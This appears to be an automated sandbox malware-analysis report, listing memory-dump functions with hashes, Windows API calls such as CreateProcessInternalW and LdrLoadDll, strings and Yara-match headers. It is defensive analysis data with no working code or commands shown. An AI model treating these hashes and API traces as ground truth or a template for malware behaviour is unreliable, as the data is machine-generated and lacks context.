Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 028DFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 028DFADB

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 028DFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 028DFAF3

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 028DFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 028DFBC3

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 028DFB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 028DFB5B

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 028DFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 028DFB73

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 028DF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 028DF9FB

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 028DF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 028DF90E

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 028DFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 028DFEDB

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 028DFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 028DFFBF

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 028DFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 028DFC6B

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 028DFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 028DFD9A

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 028DFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 028DFDCB

Memory Dump Source

Source File: 00000007.00000002.2347860208.00000000028D0000.00000040.00000001.sdmp, Offset: 028C0000, based on PE: true

Associated: 00000007.00000002.2347854761.00000000028C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347942469.00000000029B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347947125.00000000029C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347951963.00000000029C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347956525.00000000029C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347960772.00000000029D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2347997731.0000000002A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 00096ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00096F78

Strings

wininet.dll, xrefs: 00096F2E, 00096F37
net.dll, xrefs: 00096F41, 00096FC7, 00096F9F, 00096FAB, 00096FD3

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: b04aa3673f25cd13ab7e09eb4ada1aef2dc572e85f15c99f27bb06eea776cc26
Instruction ID: f1c0f75c24b2a73871ac5e316da53dcc4bb20ce7b951eba0c2d8916da526b308
Opcode Fuzzy Hash: b04aa3673f25cd13ab7e09eb4ada1aef2dc572e85f15c99f27bb06eea776cc26
Instruction Fuzzy Hash: E73190B1601704ABCB25DF68D8B1FA7B7F8BB48700F00842DF61A5B242D731B945DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00096EC6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00096F78

Strings

wininet.dll, xrefs: 00096F2E, 00096F37
net.dll, xrefs: 00096F41, 00096F9F, 00096FAB

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 54275a8c1ada6f29dd675fbb2b29ef8f0acaec9254d2a5ecf27e7bfa5abd7098
Instruction ID: 5aa6f569a9bfb3dad0234b606861d5dee14dba69cc96c0057684bd3527a0fb95
Opcode Fuzzy Hash: 54275a8c1ada6f29dd675fbb2b29ef8f0acaec9254d2a5ecf27e7bfa5abd7098
Instruction Fuzzy Hash: 0731A2B1601700ABCB14DF68D8A1FABBBB4FF48704F10842DF6195B242D371A845DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000984B5, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984ED

Strings

.z`, xrefs: 000984DC, 000984E8

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: d1f1957fd8065c3a0872f92eac0eaa813b3f8369615c83143d0fae9d5e6e560c
Instruction ID: 29c623faeb6f2ebaa99a5721c9f1f44f8fcb397c8fdbee9823c787dfaf829d1b
Opcode Fuzzy Hash: d1f1957fd8065c3a0872f92eac0eaa813b3f8369615c83143d0fae9d5e6e560c
Instruction Fuzzy Hash: 38E030B1200604ABC714DF65CC45E9777A8EF48360F118254B9189B291C631E810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 000984C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 000984ED

Strings

.z`, xrefs: 000984DC, 000984E8

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 328bf0f62db3d8abc1ce4827b1d9d951b4c8beb809e8fbe3683c68d47cc07640
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 80E01AB12002046BDB14DF59CC45EE777ACAF88750F018554BA0857342CA30E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00087260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872DB

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
Instruction ID: 510fcc912754c5bf7b46505b14e642f0217a5f1fce34de7c2b8a5746be955fa1
Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
Instruction Fuzzy Hash: 8001A731A802287AEB20B6949C43FFF776C6B00B50F140119FF04BA1C2E694690647F5

Uniqueness

Uniqueness Score: -1.00%

Function 00089B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089B82

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: cf5d96cfa9e9af59e5533b7ad4aec78180b733f8f6a1309060bc0b03ea090bf5
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: FB011EB5E4020DABDF10EBE4ED42FEDB3B8AB54308F0441A5E90897242F631EB14DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0009852D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 342161f3193a37bb8be73693f9625f66b370b1d1a72ca90f5d9720a5c8de2923
Instruction ID: d741058ffe8f60c927d698d32091fbcf7595bfbb33b9580a46d7929017d1b92a
Opcode Fuzzy Hash: 342161f3193a37bb8be73693f9625f66b370b1d1a72ca90f5d9720a5c8de2923
Instruction Fuzzy Hash: CE01AFB2211108AFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7245DA30E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00098530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00098584

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: c59b42b6632d0895df0417b4e2b9a8becf80424f8c64f19b9aee7e8aff47414d
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 8101AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00097000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCC0,?,?), ref: 0009703C

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 6d34c6e598135bf535da216d5527c321fb023720bd5cf6a1c6f715cbcdd2cb36
Instruction ID: 12f86fecdccde865bf8d0ce33b41cd9dac6650d89e77a9b942b0f77982845b7e
Opcode Fuzzy Hash: 6d34c6e598135bf535da216d5527c321fb023720bd5cf6a1c6f715cbcdd2cb36
Instruction Fuzzy Hash: 29E06D333902043AE7306599AC02FE7B29C8B81B20F140026FA0DEA2C2D595F90152A4

Uniqueness

Uniqueness Score: -1.00%

Function 00098611, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CF92,0008CF92,?,00000000,?,?), ref: 00098650

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 54e606791d0923359827c986280835582537083f8145094dcb4d36ec0a0b7a48
Instruction ID: 7d0b93d5c162251ca721b5f317e4a3b0c4e3bc4fe82d273b4955256ccda7a2be
Opcode Fuzzy Hash: 54e606791d0923359827c986280835582537083f8145094dcb4d36ec0a0b7a48
Instruction Fuzzy Hash: D6F08C71200208ABDB20CF68DC44EDB77ACEF85260F148158F909AB282CA30A800CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00098480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00093506,?,00093C7F,00093C7F,?,00093506,?,?,?,?,?,00000000,00000000,?), ref: 000984AD

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: fbdf59b571a901eefcdfcf86bfa9680329d111587b15b1f5142f710709a765f9
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 02E012B1200208ABDB14EF99CC41EE777ACAF88650F118558BA089B382CA30F9108BF0

Uniqueness

Uniqueness Score: -1.00%

Function 00098620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CF92,0008CF92,?,00000000,?,?), ref: 00098650

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 41ec7ab19a1a1cfe3868940f58b4777f3bcdd06e05e8724f7211c0fc3ae12589
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 25E01AB12002086BDB10DF49CC85EE737ADAF89650F018154BA0857342C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0008D3F7, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00087C63,?), ref: 0008D42B

Memory Dump Source

Source File: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: a312bf4cb983829d1bc19c61344caff37f29342901dd2da856a15589ce8914d4
Instruction ID: 9bd4d987a3b26ac171cd58adbb0b3aafcad7a2dfd6f69707b61f7ba619d4d53e
Opcode Fuzzy Hash: a312bf4cb983829d1bc19c61344caff37f29342901dd2da856a15589ce8914d4
